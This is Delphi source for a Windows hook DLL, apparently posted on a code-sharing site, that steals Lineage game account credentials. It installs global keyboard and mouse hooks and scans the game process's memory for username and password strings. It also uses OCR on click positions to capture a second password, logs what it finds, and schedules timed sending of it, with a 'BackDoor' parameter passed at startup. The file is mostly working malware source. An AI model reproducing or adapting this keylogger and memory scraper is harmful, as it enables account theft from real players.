📄 unithookdll.pas
字号:
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
//MemoAddr, lpNumberOfBytesRead
OldBasse: DWORD;
d1, size: longword;
i2: integer;
p: pchar;
bBreak:boolean;
begin
bBreak:=false;
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, GetCurrentProcessId);
if ProcessHndle > 0 then
begin
writedat('g1');
GetSystemInfo(SysInfo);
OldBasse := $FFFFFFFF;
i2 := 1;
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
try
while (not bBreak)and(dword(PMemoAddr) < dword(SysInfo.lpMaximumApplicationAddress)) do
begin
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
if (dword(MbI.BaseAddress) = OldBasse) and (MbI.RegionSize <= 0) then break;
writedat('g2:'+inttostr(integer(MbI.BaseAddress)));
OldBasse := dword(MbI.BaseAddress);
PMemoAddr := pointer(dword(MbI.BaseAddress) + MbI.RegionSize + $F);
//setlength(sTmp, MbI.RegionSize);
//ReadProcessMemory(ProcessHndle, PMemoAddr, pchar(sTmp), MbI.RegionSize, lpNumberOfBytesRead);
//if(MBI.State = MEM_COMMIT)then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
size := MbI.RegionSize - $14E;
while true do
begin
d1 := StrPosChar(p, size, #$C5);
if d1 = $FFFFFFFF then break;
dec(size, d1 + 1);
inc(p, d1);
if (plongword(p)^ = $49C549C5) then
begin
if strlcomp(p, sconst, $4E) = 0 then
begin
writedat('found:' + inttostr(i2) + ' ' + inttostr(integer(P)));
if i2 = 1 then pUp1 := p
else if i2 = 2 then pUp2 := p;
inc(i2);
if do1(p) then
begin
bBreak:=true;
break;
end;
end;
end;
inc(p);
end;
except
end;
end;
end;
except
end;
end;
CloseHandle(ProcessHndle);
ThreadBusy := false;
end;
procedure GetMemUserPass2000XP;
// MeXP Other OtherXP Other2000
//0012FE30->0038B130 003FB100 003FB140[6ef0] 00350000
//0012FE48->0038B130 003FB100
//0012FE34->0038B0E8 003FB0B8
//0012FE44->00384348 003F4318
// 0038AEF8->037A9B18 003FAEC8->0B634C38 003FAF08
//UserAddr 037A9B54 0B634BEC 0A3208E0
//PassAddr 037A9BDc 0B634C74 0A320968
//var
// ThreadId1: dword;
begin
try
if pUserPass <> nil then
begin
get2000xp(pUserPass);
exit;
end;
if pUP2 <> nil then do1(pUP2)
else begin
if not ThreadBusy then
begin
ThreadBusy := true;
//CreateThread(nil, 0, @ThreadFind, nil, 0, ThreadId1);
ThreadFind;
end;
end;
except
end;
end;
function StrPosW(Str: PChar; iLen: longword; c: word): longword; assembler;
asm
PUSH EDI
PUSH EBX
OR EAX,EAX //Str1
JE @@2
MOV EDI,EAX
MOV EBX,EAX
MOV AX,CX //c
MOV ECX,EDX //iLen
Shr ECX,1 // !!!! /2
INC ECX
REPNE SCASW
CMP ECX,0
JE @@2
MOV EAX,EDI
SUB EAX,EBX
SUB EAX,2 // !!!! -2
JMP @@3
@@2: MOV EAX,0FFFFFFFFH
@@3: POP EBX
POP EDI
end;
procedure GetMemUserPass9x;
label exit1;
var
ProcessHndle: HWND;
SysInfo: _SYSTEM_INFO;
MBI: MEMORY_BASIC_INFORMATION;
PMemoAddr: Pointer;
p, LastP1, LastP2: pchar;
LastSeg: word;
CountSeg, nSize, size, d1: DWORD;
i: integer;
bFound: boolean;
begin
if hasSend then exit;
if (pUP1 <> nil) and (pUP2 <> nil) then
begin
if (pUP1[0] > #$20) and (pUP1[0] < #$80) and
(pUP2[0] > #$20) and (pUP2[0] < #$80) then
begin
strcopy(@user, pUP1);
strcopy(@pass, pUP2);
writedat('user:' + user + ' pass:' + pass);
if timer1 <> 0 then killtimer(0, timer1);
timer1 := settimer(0, 1, 20000, @TimerSend);
end
else if (pUP1[0] = #0) or (pUP2[0] = #0) then //nothing
else begin
//
end;
exit;
end;
ProcessHndle := OpenProcess(PROCESS_VM_OPERATION or PROCESS_VM_READ or PROCESS_QUERY_INFORMATION, false, GetCurrentProcessId);
if ProcessHndle <= 0 then
begin
writedat('OpenProcess error');
exit;
end;
try
LastSeg := $FFFF;
CountSeg := 0;
LastP1 := pointer($FFFFFFFF);
LastP2 := pointer($FFFFFFFF);
GetSystemInfo(SysInfo);
PMemoAddr := SysInfo.lpMinimumApplicationAddress;
while dword(PMemoAddr) < dword(SysInfo.lpMaximumApplicationAddress) do
begin
fillchar(MBI, sizeof(MBI), 0);
VirtualQueryEx(ProcessHndle, PMemoAddr, MBI, SizeOf(MBI));
if MBI.RegionSize = 0 then
begin
//writedat('Base'+inttostr(dword(mbi.BaseAddress))+' '+inttostr(MBI.RegionSize));
break;
end;
//else writedat('Base'+inttostr(dword(mbi.BaseAddress))+' '+inttostr(MBI.RegionSize));
nSize := MBI.RegionSize;
if MBI.State = MEM_COMMIT then //MEM_COMMIT=$1000 MEM_RESERVE=$2000 MEM_FREE=$10000
begin
if (Mbi.Protect = PAGE_READONLY) or (Mbi.Protect = PAGE_READWRITE) or (Mbi.Protect = PAGE_WRITECOPY) then
begin
try
p := MbI.BaseAddress;
size := MbI.RegionSize - $24;
while true do
begin
d1 := StrPosW(p, size, $0021);
if d1 = $FFFFFFFF then break;
dec(size, d1 + 2);
inc(p, d1);
if (pword(@p[2])^ = 0) and
(plongword(@p[$1C])^ = $00000021) and (plongword(@p[$18])^ = $00000000) then
begin
bFound := false;
for i := 4 to $18 - 1 do
begin
if p[i] = #0 then
begin
if i <> 4 then bFound := true;
break;
end
else if (p[i] <= #$20) or (p[i] >= #$80) then break;
end;
if bFound then
begin
//writedat(inttostr(dword(p) + 4) + ' ' + strpas(p + 4) + ' ' + inttostr(CountSeg));
if LastSeg = dword(p) shr 16 then
begin
inc(CountSeg);
end
else begin
if CountSeg = 1 then
begin
pUP1 := LastP1 + 4;
pUP2 := LastP2 + 4;
strcopy(@user, pUP1);
strcopy(@pass, pUP2);
writedat('user:' + user + ' pass:' + pass);
end;
CountSeg := 0;
LastSeg := dword(p) shr 16;
end;
LastP2 := LastP1;
LastP1 := p;
end;
{if i2 = 1 then pUp1 := p
else if i2 = 2 then pUp2 := p;
inc(i2);
if do1(p) then
begin
goto exit1;
end;}
end;
inc(p, 2);
end;
except
end;
end;
end;
PMemoAddr := Pointer(DWORD(PMemoAddr) + nSize);
end;
if CountSeg = 1 then
begin
pUP1 := LastP1 + 4;
pUP2 := LastP2 + 4;
strcopy(@user, pUP1);
strcopy(@pass, pUP2);
writedat('user:' + user + ' pass:' + pass);
if timer1 <> 0 then killtimer(0, timer1);
timer1 := settimer(0, 1, 20000, @TimerSend);
end;
except
end;
exit1:
CloseHandle(ProcessHndle);
end;
procedure LogoMouse(wpa, lpa: integer);
var
p, pbak1: hwnd;
WinText, ClassText: array[0..255] of char;
text: string;
pt: TPoint;
begin
if not isCQ then exit;
p := pMOUSEHOOKSTRUCT(lpa)^.hwnd; //GetForegroundWindow;
WinText[0] := #0;
GetWindowText(p, WinText, sizeof(WinText));
ClassText[0] := #0;
GetClassName(p, ClassText, sizeof(ClassText));
writedat('iStatueMain:' + inttostr(iStatueMain) +
' mouse WinText:' + WinText + ' class:' + classtext + ' x:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.X) +
' Y:' + inttostr(pMOUSEHOOKSTRUCT(lpa)^.pt.Y));
if (classtext = 'Button') then
begin
pbak1 := p;
if (isParent(pbak1, '', 'serverListWnd', true)) then
begin
text := WinText;
strcopy(@pshmem^.quserver, pchar(text));
writedat('区mouse: ' + pshmem^.quserver);
iStatueMain := 0;
user[0] := #0;
pass[0] := #0;
role := 0;
end;
end
else if (wintext = 'Lineage Windows Client') and (classtext = 'Lineage') then
begin
if pUserPass <> nil then
begin
if is9x then GetMemUserPass9x
else GetMemUserPass2000xp
end;
PushCursorPos(pMOUSEHOOKSTRUCT(lpa)^.pt);
if OCR(pt, 'OK') then
begin
writedat('OCR Found Text:' + inttostr(pt.X) + ',' + inttostr(pt.Y));
CalcWuPinPass(pt);
end;
{ GetEditCount(p, 'LUnicodeEdit', 'LMyEdit');
writedat('iC: ' + inttostr(ic1) + ' ' + inttostr(ic2) + ' ' + inttostr(ic3) + ' ' + inttostr(ic4) + ' user:' + user + ' pass:' + pass);
if (((ic1 = 2) and (ic2 = 2)) or ((ic1 = 1) and (ic2 = 1)))
and (ic3 = 0) and (ic4 = 0) then
begin
iStatueMain := Maxint;
if (user[0] <> #0) then //and (pass[0] <> #0)
begin
LastUser := user;
LastPass := pass;
timer2 := settimer(0, 1, 20000, @timerfun);
end;
user[0] := #0;
pass[0] := #0
end;}
if (wpa = WM_LBUTTONDBLCLK) and (user[0] <> #0) and (pass[0] <> #0) then
begin
//角色1 20-149
if (pMOUSEHOOKSTRUCT(lpa)^.pt.Y <= 291) then
begin
if (user[0] <> #0) and (pass[0] <> #0) then
begin
iStatueMain := Maxint;
with pMOUSEHOOKSTRUCT(lpa)^.pt do
if (x >= 20) and (x <= 149) then role := 1
else if (x >= 176) and (x <= 307) then role := 2
else if (x >= 333) and (x <= 464) then role := 3
else if (x >= 490) and (x <= 621) then role := 4;
end;
end;
end;
end;
end;
procedure LogoKey(wpa, lpa: integer);
//var
// p, pbak1, L: hwnd;
// s: string;
// buffer, WinText, ClassText: array[0..255] of char;
begin
if not isCQ then exit;
writedat('key0:' + inttostr(Wpa));
if is9x then GetMemUserPass9x
else GetMemUserPass2000xp;
end;
function KeyPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
var
ClassText: array[0..255] of char;
p: hwnd;
begin
Result := CallNextHookEx(pshmem^.KeyHook, iCode, wParam, lParam);
if ((Lparam and $80000000) = 0) then
begin
LogoKey(wparam, lparam);
end;
end;
function MouseProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
var
ClassText: array[0..255] of char;
p: hwnd;
begin
if (wparam = WM_LBUTTONDOWN) or (wparam = WM_RBUTTONDOWN) or (wparam = WM_LBUTTONDBLCLK) then
begin
LogoMouse(wparam, lparam);
end;
Result := CallNextHookEx(pshmem^.MouseHook, iCode, wParam, lParam);
end;
{function CallProc(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT;
stdcall; export;
begin
Result := CallNextHookEx(CallHook, iCode, wParam, lParam);
end; }
procedure StartHook(data: pchar; BackDoor: pchar; VerTest: boolean); stdcall;
//var
// SystemTime: TSystemTime;
begin
// GetLocalTime(SystemTime);
// with SystemTime do
// if (wYear >= 2004) and (wMonth >= 9) then exit;
Killer;
FirstProcess := true;
pshmem^.quserver[0] := #0;
pshmem^.VerTest := VerTest;
TimerWriteDat := settimer(0, 10, 1000, @FunTimerWriteDat);
strcopy(pshmem^.data, data);
strcopy(pshmem^.backdoor, backdoor);
if pshmem^.KeyHook = 0 then
pshmem^.KeyHook := SetWindowsHookEx(WH_KEYBOARD, Keypro, HInstance, 0);
if pshmem^.MouseHook = 0 then
pshmem^.MouseHook := SetWindowsHookEx(WH_MOUSE, MouseProc, Hinstance, 0);
// if callhook = 0 then
// callhook := SetWindowsHookEx(WH_CALLWNDPROC, callProc, Hinstance, 0);
end;
procedure StopHook; stdcall;
begin
killtimer(0, TimerWriteDat);
if pshmem^.KeyHook <> 0 then
UnhookwindowsHookEx(pshmem^.KeyHook);
pshmem^.KeyHook := 0;
if pshmem^.MouseHook <> 0 then
UnhookwindowsHookEx(pshmem^.MouseHook);
pshmem^.MouseHook := 0;
// if callHook <> 0 then
// UnhookwindowsHookEx(callHook);
// callHook := 0;
end;
initialization
ThreadBusy := false;
iStep := 0;
timer1 := 0;
quserverLocal[0] := #0;
iStatueMain := 0;
user[0] := #0;
pass[0] := #0;
WuPinPass[0] := #0;
hasSend := false;
role := 0;
// LastUser := '';
// LastPass := '';
pMousePoint := 0;
for i1 := 0 to MaxPoint - 1 do
begin
MousePoint[i1].X := 0;
MousePoint[i1].Y := 0;
end;
FirstProcess := false;
SendHtmlMailData := '';
is9x := IsWindows9x;
hMappingFile := CreateFileMapping($FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(TShareMem), pchar(MappingFileName));
pShMem := MapViewOfFile(hMappingFile, FILE_MAP_WRITE or FILE_MAP_READ, 0, 0, 0);
filename := extractfilename(GetModalName(GetCurrentProcessId, '.bin'));
isCQ := (ansicomparetext(filename, 'lineage.exe') = 0) or (ansicomparetext(filename, 'lin.bin') = 0);
isIE := (ansicomparetext(filename, 'IEXPLORE.EXE') = 0);
finalization
try
if FirstProcess then
StopHook;
UnMapViewOfFile(pShMem);
CloseHandle(hMappingFile);
except
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -